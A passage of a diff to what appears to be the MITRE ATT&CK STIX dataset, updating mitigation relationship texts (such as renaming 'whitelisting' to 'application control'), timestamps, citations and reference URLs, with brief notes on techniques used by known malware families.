"target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--1a69dce6-b39e-4cd2-a29a-18e42293c51a",
"type": "relationship",
- "modified": "2020-03-28T17:34:02.841Z",
+ "modified": "2020-06-25T03:32:51.271Z",
"created": "2020-03-09T14:29:52.125Z"
},
{
@@ -165759,10 +167122,10 @@
"source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
"target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"relationship_type": "mitigates",
- "description": "Turn off or restrict access to VBScript.",
+ "description": "Turn off or restrict access to unneeded VB components.",
"id": "relationship--0f27ea83-21e7-4a9f-9c66-85fe85da5135",
"type": "relationship",
- "modified": "2020-03-28T17:34:02.843Z",
+ "modified": "2020-06-25T03:32:51.262Z",
"created": "2020-03-09T14:29:52.132Z"
},
{
@@ -165789,7 +167152,7 @@
"description": "Prevent users from installing Python where not required.",
"id": "relationship--9e0a19f8-e970-49a1-9952-ae7380247ace",
"type": "relationship",
- "modified": "2020-03-28T17:44:07.886Z",
+ "modified": "2020-06-23T19:03:15.357Z",
"created": "2020-03-09T14:38:24.604Z"
},
{
@@ -165800,10 +167163,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
"relationship_type": "mitigates",
- "description": "Blacklist Python where not required.",
+ "description": "Denylist Python where not required.",
"id": "relationship--b7f73589-4640-468d-8422-04cfc7e7e110",
"type": "relationship",
- "modified": "2020-03-28T17:44:07.889Z",
+ "modified": "2020-06-23T19:03:15.359Z",
"created": "2020-03-09T14:38:24.610Z"
},
{
@@ -165817,7 +167180,7 @@
"description": "Inventory systems for unauthorized Python installations.",
"id": "relationship--03b2c5b8-aeca-4232-a206-521b83d56c54",
"type": "relationship",
- "modified": "2020-03-28T17:44:07.916Z",
+ "modified": "2020-06-23T19:03:15.369Z",
"created": "2020-03-09T14:38:24.627Z"
},
{
@@ -166098,7 +167461,7 @@
"description": "Prevent users from installing their own launch agents or launch daemons.",
"id": "relationship--e2bf1135-6715-446a-aff7-96d5a0a20477",
"type": "relationship",
- "modified": "2020-03-28T18:28:34.736Z",
+ "modified": "2020-06-08T23:28:29.240Z",
"created": "2020-03-10T18:26:56.467Z"
},
{
@@ -166244,7 +167607,7 @@
"description": "A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.",
"id": "relationship--8767be49-dbb2-493f-82b7-cc0053f02c8e",
"type": "relationship",
- "modified": "2020-03-11T14:13:43.009Z",
+ "modified": "2020-07-07T12:42:39.292Z",
"created": "2020-03-11T14:13:43.009Z"
},
{
@@ -166255,10 +167618,17 @@
"source_ref": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"target_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720",
"relationship_type": "mitigates",
- "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.",
+ "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)",
"id": "relationship--4d76c9e2-bef1-4b2c-8199-a9a454cf1168",
+ "external_references": [
+ {
+ "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
+ "source_name": "OWASP Top 10"
+ }
+ ],
"type": "relationship",
- "modified": "2020-03-31T13:11:42.307Z",
+ "modified": "2020-07-14T22:22:06.474Z",
"created": "2020-03-11T14:13:43.029Z"
},
{
@@ -166285,7 +167655,7 @@
"description": "A patch management process should be implemented to check unused applications, unmaintained and/or previously vulnerable software, unnecessary features, components, files, and documentation.",
"id": "relationship--e177cd6d-a6ca-4062-9dfe-e238e22c51a7",
"type": "relationship",
- "modified": "2020-03-11T14:17:21.278Z",
+ "modified": "2020-07-07T12:42:39.279Z",
"created": "2020-03-11T14:17:21.278Z"
},
{
@@ -166296,10 +167666,17 @@
"source_ref": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"target_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
"relationship_type": "mitigates",
- "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.",
+ "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)",
"id": "relationship--f57f7e65-0017-45a2-9abd-db439a64ad45",
+ "external_references": [
+ {
+ "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
+ "source_name": "OWASP Top 10"
+ }
+ ],
"type": "relationship",
- "modified": "2020-03-31T13:11:42.312Z",
+ "modified": "2020-07-14T22:22:06.510Z",
"created": "2020-03-11T14:17:21.292Z"
},
{
@@ -166332,13 +167709,13 @@
"source_name": "TCG Trusted Platform Module"
},
{
- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
"type": "relationship",
- "modified": "2020-03-23T12:51:45.557Z",
+ "modified": "2020-04-23T19:10:28.416Z",
"created": "2020-03-11T14:28:40.154Z"
},
{
@@ -166417,10 +167794,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"relationship_type": "mitigates",
- "description": "Application whitelisting may be able to prevent the running of executables masquerading as other files.",
+ "description": "Application control may be able to prevent the running of executables masquerading as other files.",
"id": "relationship--60e4698b-a16d-4a40-8473-4d88e2e70881",
"type": "relationship",
- "modified": "2020-03-11T14:55:56.283Z",
+ "modified": "2020-06-20T20:11:42.901Z",
"created": "2020-03-11T14:49:37.065Z"
},
{
@@ -167006,7 +168383,7 @@
"id": "relationship--469231fb-3797-49bf-9f23-078b37a35671",
"description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation. ",
"type": "relationship",
- "modified": "2020-03-26T19:43:34.145Z",
+ "modified": "2020-06-20T22:01:10.078Z",
"created": "2020-03-13T11:42:14.585Z"
},
{
@@ -167022,20 +168399,6 @@
"modified": "2020-03-13T11:42:14.588Z",
"created": "2020-03-13T11:42:14.588Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
- "target_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
- "relationship_type": "mitigates",
- "id": "relationship--668edec4-0bf0-4130-aa3b-a884b41fd310",
- "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
- "type": "relationship",
- "modified": "2020-03-26T19:55:40.119Z",
- "created": "2020-03-13T13:51:58.665Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -167045,9 +168408,9 @@
"target_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
"relationship_type": "mitigates",
"id": "relationship--ca04cce0-2f47-4c73-956f-808573b62903",
- "description": "Require that all executables be placed in write-protected directories.",
+ "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.",
"type": "relationship",
- "modified": "2020-03-26T19:55:40.132Z",
+ "modified": "2020-05-20T15:12:39.573Z",
"created": "2020-03-13T13:51:58.682Z"
},
{
@@ -167122,9 +168485,9 @@
"description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016."
}
],
- "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application whitelisting tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
+ "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
"type": "relationship",
- "modified": "2020-03-26T19:55:40.164Z",
+ "modified": "2020-06-20T20:11:42.903Z",
"created": "2020-03-13T13:51:58.701Z"
},
{
@@ -167140,20 +168503,6 @@
"modified": "2020-03-13T13:51:58.704Z",
"created": "2020-03-13T13:51:58.704Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
- "target_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
- "relationship_type": "mitigates",
- "id": "relationship--0f9bf2ed-2ab3-4783-bdac-07498c457bcd",
- "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
- "type": "relationship",
- "modified": "2020-03-26T19:59:42.593Z",
- "created": "2020-03-13T14:10:43.546Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -167163,9 +168512,9 @@
"target_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
"relationship_type": "mitigates",
"id": "relationship--5a70a968-618c-489e-8087-eabca740aa3a",
- "description": "Require that all executables be placed in write-protected directories.",
+ "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.",
"type": "relationship",
- "modified": "2020-03-26T19:59:42.604Z",
+ "modified": "2020-06-20T22:02:41.210Z",
"created": "2020-03-13T14:10:43.564Z"
},
{
@@ -167209,9 +168558,9 @@
"description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016."
}
],
- "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application whitelisting tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
+ "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
"type": "relationship",
- "modified": "2020-03-26T19:59:42.624Z",
+ "modified": "2020-06-20T22:02:41.224Z",
"created": "2020-03-13T14:10:43.585Z"
},
{
@@ -167242,7 +168591,7 @@
],
"description": "Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.\n\nClean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)",
"type": "relationship",
- "modified": "2020-03-26T19:59:42.628Z",
+ "modified": "2020-06-20T22:02:41.227Z",
"created": "2020-03-13T14:10:43.598Z"
},
{
@@ -167258,20 +168607,6 @@
"modified": "2020-03-13T14:10:43.600Z",
"created": "2020-03-13T14:10:43.600Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
- "target_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
- "relationship_type": "mitigates",
- "id": "relationship--6760d1c5-ea72-43af-aadc-4f60f6bcf6c7",
- "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
- "type": "relationship",
- "modified": "2020-03-26T20:03:27.681Z",
- "created": "2020-03-13T17:48:59.191Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -167281,9 +168616,9 @@
"target_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
"relationship_type": "mitigates",
"id": "relationship--6a3e8d7c-fdb3-4249-9f4e-7825e253bbfd",
- "description": "Require that all executables be placed in write-protected directories.",
+ "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.",
"type": "relationship",
- "modified": "2020-03-26T20:03:27.700Z",
+ "modified": "2020-05-20T15:12:39.563Z",
"created": "2020-03-13T17:48:59.195Z"
},
{
@@ -167327,9 +168662,9 @@
"description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016."
}
],
- "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application whitelisting tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
+ "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )",
"type": "relationship",
- "modified": "2020-03-26T20:03:27.736Z",
+ "modified": "2020-06-20T20:11:42.907Z",
"created": "2020-03-13T17:48:59.197Z"
},
{
@@ -167411,9 +168746,9 @@
"target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
"relationship_type": "mitigates",
"id": "relationship--22ce2c93-ecd6-4627-b3f0-6f7476754c79",
- "description": "Adversaries may use new DLLs to execute this technique. Identify and block potentially malicious software executed through search order hijacking by using application whitelisting solutions capable of blocking DLLs loaded by legitimate software.",
+ "description": "Adversaries may use new DLLs to execute this technique. Identify and block potentially malicious software executed through search order hijacking by using application control solutions capable of blocking DLLs loaded by legitimate software.",
"type": "relationship",
- "modified": "2020-03-26T16:13:59.062Z",
+ "modified": "2020-06-20T20:11:42.891Z",
"created": "2020-03-13T18:11:08.487Z"
},
{
@@ -167461,7 +168796,7 @@
"id": "relationship--1c47aa23-d267-49f3-9faf-c45b6de0ad6e",
"description": "Update software regularly to include patches that fix DLL side-loading vulnerabilities.",
"type": "relationship",
- "modified": "2020-03-26T16:23:21.192Z",
+ "modified": "2020-06-20T22:05:42.679Z",
"created": "2020-03-13T19:41:37.989Z"
},
{
@@ -167475,7 +168810,7 @@
"id": "relationship--0eacc0c1-d7f7-42f6-b8c6-288f0b2f605e",
"description": "Install software in write-protected locations.",
"type": "relationship",
- "modified": "2020-03-26T16:23:21.205Z",
+ "modified": "2020-06-20T22:05:42.674Z",
"created": "2020-03-13T19:41:38.007Z"
},
{
@@ -167489,7 +168824,7 @@
"id": "relationship--4bcf6ed0-7650-4433-8293-19377bc60e24",
"description": "Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.",
"type": "relationship",
- "modified": "2020-03-26T16:23:21.207Z",
+ "modified": "2020-06-20T22:05:42.693Z",
"created": "2020-03-13T19:41:38.009Z"
},
{
@@ -167720,10 +169055,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
"relationship_type": "mitigates",
- "description": "Limit or restrict program execution using anti-virus software. On MacOS, whitelist programs that are allowed to have the plist tag. All other programs should be considered suspicious.",
+ "description": "Limit or restrict program execution using anti-virus software. On MacOS, allowlist programs that are allowed to have the plist tag. All other programs should be considered suspicious.",
"id": "relationship--1279ae2b-fb00-4980-a5cc-9a802ad2901d",
"type": "relationship",
- "modified": "2020-03-29T22:49:43.701Z",
+ "modified": "2020-06-20T20:11:42.900Z",
"created": "2020-03-13T20:26:49.687Z"
},
{
@@ -167940,19 +169275,6 @@
"modified": "2020-03-26T22:02:25.401Z",
"created": "2020-03-14T18:18:32.793Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
- "relationship_type": "revoked-by",
- "id": "relationship--0c1ac2fa-dae6-4713-8aba-7945dc8cf92f",
- "type": "relationship",
- "modified": "2020-03-14T18:19:15.012Z",
- "created": "2020-03-14T18:19:15.012Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -168165,10 +169487,10 @@
"source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
"relationship_type": "mitigates",
- "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).",
+ "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).",
"id": "relationship--a424a85c-a3c6-4d84-85f7-e55c8dbe21fc",
"type": "relationship",
- "modified": "2020-03-14T23:19:38.118Z",
+ "modified": "2020-06-20T20:46:36.698Z",
"created": "2020-03-14T23:19:38.118Z"
},
{
@@ -168193,10 +169515,10 @@
"source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"target_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d",
"relationship_type": "mitigates",
- "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).",
+ "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).",
"id": "relationship--4735a1be-c556-4844-9554-d2313376f09a",
"type": "relationship",
- "modified": "2020-03-14T23:23:41.913Z",
+ "modified": "2020-06-20T20:46:36.683Z",
"created": "2020-03-14T23:23:41.913Z"
},
{
@@ -168236,7 +169558,7 @@
"description": "If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.",
"id": "relationship--2d63a9e6-9be2-44ea-8276-89ae92049509",
"type": "relationship",
- "modified": "2020-03-14T23:29:19.751Z",
+ "modified": "2020-06-20T20:53:20.509Z",
"created": "2020-03-14T23:29:19.751Z"
},
{
@@ -168411,7 +169733,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--50565ea3-2627-44b0-8dd3-155e37d425f3",
"type": "relationship",
- "modified": "2020-03-26T20:58:10.351Z",
+ "modified": "2020-06-20T22:28:45.436Z",
"created": "2020-03-15T14:59:15.466Z"
},
{
@@ -168445,7 +169767,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T00:43:24.363Z",
+ "modified": "2020-05-14T13:05:39.790Z",
"created": "2020-03-15T15:30:42.442Z"
},
{
@@ -168507,7 +169829,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T00:45:51.161Z",
+ "modified": "2020-05-14T13:05:39.798Z",
"created": "2020-03-15T15:34:30.892Z"
},
{
@@ -168569,7 +169891,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T00:50:31.503Z",
+ "modified": "2020-05-14T13:05:39.788Z",
"created": "2020-03-15T15:37:47.706Z"
},
{
@@ -168794,7 +170116,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-16T15:00:55.083Z",
+ "modified": "2020-06-26T12:42:08.050Z",
"created": "2020-03-16T14:49:02.682Z"
},
{
@@ -168805,7 +170127,7 @@
"source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f",
"target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84",
"relationship_type": "mitigates",
- "description": "Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)",
+ "description": "Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)\n\nLimit access to the root account and prevent users from modifying protected components through proper privilege separation (ex SELinux, grsecurity, AppArmor, etc.) and limiting Privilege Escalation opportunities.",
"id": "relationship--dafa1584-bdd9-4c46-be07-2d002a529948",
"external_references": [
{
@@ -168825,7 +170147,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-16T15:00:55.119Z",
+ "modified": "2020-06-26T12:42:08.076Z",
"created": "2020-03-16T14:49:02.706Z"
},
{
@@ -168839,7 +170161,7 @@
"description": "Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs. ",
"id": "relationship--2686dfb7-60ab-424c-add2-2f164a98cfa4",
"type": "relationship",
- "modified": "2020-03-16T15:00:55.125Z",
+ "modified": "2020-06-26T12:42:08.079Z",
"created": "2020-03-16T14:49:02.709Z"
},
{
@@ -168853,7 +170175,7 @@
"description": "Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (C:\\Windows\\System32\\ by default) of a domain controller and/or local computer with a corresponding entry in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages. ",
"id": "relationship--fc8ef14d-1a07-4f96-85c3-b62ba6bcffc1",
"type": "relationship",
- "modified": "2020-03-16T15:00:55.114Z",
+ "modified": "2020-06-26T12:42:08.074Z",
"created": "2020-03-16T14:49:02.714Z"
},
{
@@ -168989,7 +170311,7 @@
"id": "relationship--36f7b849-03af-4567-be71-2e1eb1520b2a",
"description": "Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard dylib folders.",
"type": "relationship",
- "modified": "2020-03-27T15:32:06.325Z",
+ "modified": "2020-06-20T22:06:47.264Z",
"created": "2020-03-16T15:23:31.062Z"
},
{
@@ -169285,16 +170607,21 @@
"description": "The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018."
},
{
- "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.",
+ "source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
- "source_name": "Fortinet Agent Tesla June 2017"
+ "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has used SMTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has used SMTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)",
"relationship_type": "uses",
"id": "relationship--c5401268-6b27-4088-9f2e-5439f68685d9",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.323Z",
+ "modified": "2020-05-20T13:38:07.113Z",
"created": "2020-03-17T00:03:03.734Z"
},
{
@@ -170012,14 +171339,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"description": "The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including SMB.(Citation: Kaspersky Regin)",
"relationship_type": "uses",
"id": "relationship--5e23c694-3f4a-43f7-823b-8ea36558c928",
"type": "relationship",
- "modified": "2020-03-17T02:25:11.600Z",
+ "modified": "2020-06-29T01:54:53.455Z",
"created": "2020-03-17T02:25:11.600Z"
},
{
@@ -170272,21 +171599,21 @@
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"external_references": [
{
- "description": "Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.",
+ "source_name": "Trend Micro Banking Malware Jan 2019",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/",
- "source_name": "Trend Micro Banking Malware Jan 2019"
+ "description": "Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019."
},
{
- "source_name": "Carbon Black Emotet Apr 2019",
+ "description": "Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.",
"url": "https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/",
- "description": "Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019."
+ "source_name": "Carbon Black Emotet Apr 2019"
}
],
"description": "[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)",
"relationship_type": "uses",
"id": "relationship--219dcd0b-a6fe-47d4-99b9-24d945b1f168",
"type": "relationship",
- "modified": "2020-03-17T13:31:00.273Z",
+ "modified": "2020-07-15T13:03:46.808Z",
"created": "2020-03-17T13:31:00.273Z"
},
{
@@ -170578,26 +171905,36 @@
"description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019."
},
{
- "source_name": "Cybereason TA505 April 2019",
+ "description": "Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.",
"url": "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware",
- "description": "Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019."
